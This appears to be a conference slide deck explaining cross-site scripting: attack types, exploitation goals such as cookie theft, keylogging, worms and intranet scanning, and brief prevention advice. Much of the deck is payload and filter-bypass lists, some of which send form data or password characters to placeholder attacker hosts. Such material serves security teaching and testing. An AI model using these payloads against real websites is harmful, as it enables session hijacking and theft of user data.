XSS is more than a simple threat
Avădănei Andrei, Software Developer, Blogger, Student
www.worldit.info
@AndreiAvadanei
#RoCyberCon @20 february
Introduction to XSS
- Short story
- XSS types
- Shouts
Short story
XSS - it's a client side vulnerability
- … but can become a server side one
- based on Javascript injection
- … and HTML, Java, ActiveX, VBScript, Flash, JSON and so on
- is the second most popular threat in 2010 (via Infosec & OWASP)
- with many resources available on the Internet (use Google)
XSS Types
Non-persistent (reflected)
- the most common type of XSS injection
- requires server side interpretation of the query
- third-party required
Persistent (stored)
- the most dangerous type of XSS injection
- requires server side interpretation of the query and data storing
- third-party may not be required
DOM-based
- the newest type of XSS injection
- requires client side interpretation
- usually non-persistent
Shouts #1 – XSS Amazon
Shouts #2 XSS Facebook
Shouts #3 XSS Google
Shouts #4 XSS Ebay
Shouts #5 More XSS'ed
Twitter, MySpace, Hi5, Wordpress, Yahoo, Joomla, PhpBB, Drupal, e107, WorldIT.info, PHP-Nuke, PHP-Fusion, *.edu, *.gov, NASA, Youtube, Blogspot, Symantec, Kaspersky, NOD32, browser plugins etc. etc. etc. etc.
Getting XSS'ed
- Where?
- Basic XSS'ing
- Advanced XSS'ing
- HTML 5 XSS'ed
- Bypass XSS protection
Where? everywhere
Rule: "Do not trust anything, ever, especially when it comes to user input." XSS vulnerabilities can be found in anything that comes from the user. GET, POST, COOKIE, FILES, SERVER and the request headers are the main targets. Try to be clever.
Basic XSS'ing
<script>alert(1)</script> //basic
"><script>alert(1)</script> //bypass an open tag
<!--<img src="--><img src=x onerror=alert(1)//"> //bypass & generate an error
" onmouseover="alert(1)" //all javascript events
alert(/XSS/.source) or alert( String(/Test/).substr(1,4) ); //some other simple vectors
<script>alert(String.fromCharCode(88,83,83));</script> //bypass quote filters
<IMG SRC=javascript:alert('XSS')> //unicode injection; utf-8, hex, decimal or octal injection may work
<meta http-equiv="refresh" content="0;url=http://;javascript:..." // evasion
<style type=text/javascript>alert('xss')</style> //javascript injection based on the style tag
"><img src="x:x" onerror="alert(0)"> // :D
[…]
Advanced XSS'ing
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> //background & unicode
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> //send IE into a loop
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> //xss in xml document
x='\x61\x6c\x65\x72\x74\x28\x31\x29'; new Function(x)(); //something different from everyday injections
Function('a\x6cert(1)')();// ;)
x=eval,1,1,1;1; 1,1,1,b='\\',1,1,1; 1,1,1,s='\'',1,1,1;1,1,1,o='0',1,1,1; x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) ); //eval + unicode injection
[...]
HTML 5 XSS'ed
- new technologies, new problems
<video onerror="javascript:alert(1)"><source> //new tag
<audio onerror="javascript:alert(1)"><source> //another new tag
<form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)>X //new events
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Evil payload')"> <h3>DRAG ME!!</h3> </div> //new functions, events & attributes
<input type="text" AUTOFOCUS onfocus=alert(1)>
<script>alert(localStorage.getItem('foo'))</script> //access local storage
"><script>(history.pushState({},'','index.php'))(document.forms[0].action='http://maliciousURL')</script> //conceal the real location and replace it with anything we want. Ex: http://bit.ly/pushStateXSS
Bypass XSS protection
<img/src="mars.png"alt="mars"> //no white spaces, use / instead
<object data="javascript:alert(0)"> //avoid src
<isindex type=image src=1 onerror=alert(1)> //did you know the isindex tag?
<img src=x:alert(alt) onerror=eval(src) alt=0> //another bypass for error generation
location=location.hash.slice(1); //avoid the #
http://victim.com?param=";location=location.hash)//#0={};alert(0) //payload after the hash url, victim won't see true payload
alert(document.cookie) or alert(document['cookie']) or with(document)alert(cookie) //same results
""+{toString:alert} or ""+{valueOf:alert} //Executes function without using () or =
Future tricks in HTML 5
</a onmousemove="alert(1)"> //html 5 will support events in closed tags
<style>input[name=password][value*=a]{background:url('//attacker?log[]=a');}</style> //pure CSS-based XSS
data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg== //avoid using plain text/html value
?injection=<script+&injection=>alert(1)></script> //HPP, popular in SQLi
via BlackHat Conferences.
XSS Injection Exploitation (part 1)
- Redirection
- Clickjacking
- URL Spoofing
- Session hijacking
- Cookie stuffing
- Ad Hijacking
- CSRF/XSRF attacks
- History stealing
- XSS Defacement
- Key & Mouse logging
Redirection & Clickjacking
Redirection
- redirect your victim, ex. document.location = "http://www.your-evil-site.com";
- you create fake traffic
- popular
Clickjacking
- describes one website that poses as another
- ex.: redirect the victim to your onclick event call
- used in phishing, gives high credibility
- extremely popular
URL Spoofing
- popular in phishing
- the URL is user friendly
- the web page content is hijacked and all information is sent to websites monitored by a thief
- extremely popular
Session Hijacking
- also known as "Cookie Stealing"
- usually done with the help of document.cookie
- helps you gain control over another user's logged-in session
- needs a cookie grabber
- for instance, an XSS in *.yahoo.com can help you hijack Yahoo accounts
- extremely popular
Cookie stuffing
- also known as cookie dropping
- used in blackhat online marketing
- generates illegitimate affiliate sales by hijacking cookies
- uses pop-ups, frames and iframes, images, javascript, stylesheets or flash to accomplish the cookie dropping
- popular
Ad Hijacking
- used in blackhat online marketing
- usually requires persistent XSS
- you can replace the ad scripts with your own, getting paid when a user clicks on the hijacked ads
- popular
CSRF/XSRF attacks
- unauthorized commands are transmitted from a user that the website trusts.
- usually used along with <img src="">. For instance, if <img src="http://victim.com/?do=logout" /> is permanently injected and a user accesses the page with the malformed content, he will be forced to log out.
- use your imagination, you can do more than that.
History Stealing
- you can find out what sites the victim has visited using "getComputedStyle" as below, after you have created a node matching the CSS :visited selector with a custom known color:
document.defaultView.getComputedStyle(link, null).getPropertyValue("color");
- rarely used, but still important
- it could be done using the full power of HTML 5
XSS Defacement
- looks like a server side defaced page … but it's only a client side deface
- can create chaos and confusion when used for hacking a website
- involves changing the HTML content of the page
- of course, two types: persistent and non-persistent
- persistent XSS defacements are more dangerous than non-persistent ones
Key & Mouse Logging
Keylogging - log all keystrokes and send remotely
- document.onkeypress / unsafeWindow.onkeypress events
- store keystrokes in a local variable and send them regularly to a remote server
Mouse logging - log all mouse moves and send remotely
- document.onmousemove event
- dangerous but not so popular
Tired?
You shouldn't be, because this is only the beginning...
XSS Injection Exploitation(part 2)
- Browser hijacking
- Port Scanning
- DDoS
- XSS Tunneling
- Distributed Password Cracking
- Worms (Spreading)
- Arbitrary file execution & Privilege escalation
- Intranet Hacking
Browser Hijacking
- also known as Tab Hijacking
- highly recommended when a hacker wants a second shot at the victims
- XSS Shells usually do it for you, with iframe injection
- works until the victim closes the tab
- the only drawback with this method is that the URL bar does not change with each click, which may or may not be noticeable to the user.
Distributed port scanning
- cross domain XMLHttpRequests and WebSockets can be used for remote port scanning, but using XSS you can do distributed remote port scanning
- the latest Firefox, Chrome and Safari already support these new technologies
- this option is not available yet, but it will be in the next generation of XSS Shell
- in Firefox & Safari the connection time is less than 100 ms
- 1 victim – 65,000 scanned ports – 6,500 seconds
- 100 victims – 65,000 scanned ports – 6,5 seconds
- what about 1,000 or 10,000 victims?
DDoS
- based on WebSockets
- application-level DDoS attacks (layer 7 DDoS)
- Cross Origin Requests (COR) are processed even if the site restricts them, and therefore the request still creates load on the server
- 1 minute – 1 browser – 10,000 requests / minute, using COR WebWorkers with GET requests
- 1 minute – 600 browsers – over 100,000 requests / minute, which can be enough to shut down a target
- we should wait for the majority of the browsers in the world to be upgraded, but blackhat teams will be prepared with amazing tools for DDoS
XSS Tunneling
- an XSS Channel is an interactive communication channel between two systems which is opened by an XSS attack. At a technical level, it may be an Ajax application.
- Node.js and Comet Push can make a difference in the future XSS Shells.
- XSS Tunnelling is the tunnelling of HTTP traffic through an XSS Channel, to use virtually any application that supports HTTP proxies.
- XSS Tunnel is the standard HTTP proxy which sits on the attacker's system.
- you can tunnel all your traffic through an XSS Channel
- you can build your own SSH-like protocol
- you can forget about the user session problem when hijacking is not possible because there is an IP address restriction
- again, your imagination is the limit.
Distributed Password Cracking
- JavaScript engines are becoming very fast, and we have WebWorkers.
- password guessing rates in JavaScript tools of 100,000 MD5 hashes/second
- ~100 machines running the JavaScript distributed password cracking program can match the cracking rate of one machine running a similar program written in native code.
- but these days spreading methods are very effective. Why not 10,000 compromised machines?
- Ravan - a JavaScript distributed password cracker that uses HTML5 WebWorkers. It performs password cracking in background JavaScript threads and supports salted MD5 and SHA hashes.
Worms (spreading)
- one of the most efficient environments for worm propagation: social networking
- XSS Warhol Worm, Linear XSS Worm, Hydra XSS Worm
- Samy (2005) infected over 1,000,000 MySpace users in 20 hours
- Yahoo!, Hi5, Twitter and Facebook could easily be the next targets, on a larger scale.
- you can simply attach a trojan to your worm, and the risk of creating permanent zombies is growing.
Arbitrary file execution
- in 2008 a vulnerability which affected IE 7 & IE 8 could execute arbitrary files with the help of some social engineering.
- during the last years a few other similar vulnerabilities appeared in the Internet jungle.
- still, take an XSS vulnerability and a CSRF vulnerability in an administrator file editor, which can be bypassed with same-origin XMLHttpRequest requests, and you have the right combination: the XSS vulnerability has become arbitrary code execution (privilege escalation).
- what are you waiting for? Find the next major privilege escalation vulnerability.
Intranet Hacking(part 1)
Web browsers can be completely controlled by any Web page, enabling them to become launching points to attack internal network resources. Why?
Intranet Hacking(part 2)
Exploit procedures:
- a victim visits a malicious Web page or clicks a nefarious link; embedded JavaScript malware then assumes control over their Web browser.
- the JavaScript malware loads a Java applet revealing the victim's internal NAT IP address.
- then, using the victim's Web browser as an attack platform, the JavaScript malware identifies and fingerprints Web servers on the internal network.
- attacks are initiated against internal or external Web sites, and compromised information is sent outside the network for collection.
Intranet Hacking(part 3)
Collecting information:
- Obtaining the NAT'ed IP Address – MyAddress, a special Java Applet
- Port scanning - <script src=http://ip/></script>
- Blind Web Server Fingerprinting - explore the use of unique image URLs, CSS or JavaScript files to perform fingerprinting:
<img src="http://intranet_ip/unique_image_url" onerror="fingerprint()" />
Attack the intranet
- try different well-known vulnerabilities
- try hacking the web interface of DSL routers
- load local files using file:///
- get help from XSS Shells
Preventing XSS attacks
- Filtering
- Input / Output encoding
- Web browser security
  - select a safer browser (Chrome)
  - use a virtual machine for suspicious links
  - pay more attention to shortened URLs
  - use plugins for better security (like NoScript)
XSS it's still a simple threat?
:)
Question?
Thanks. :)
Bibliography
Experience & Google.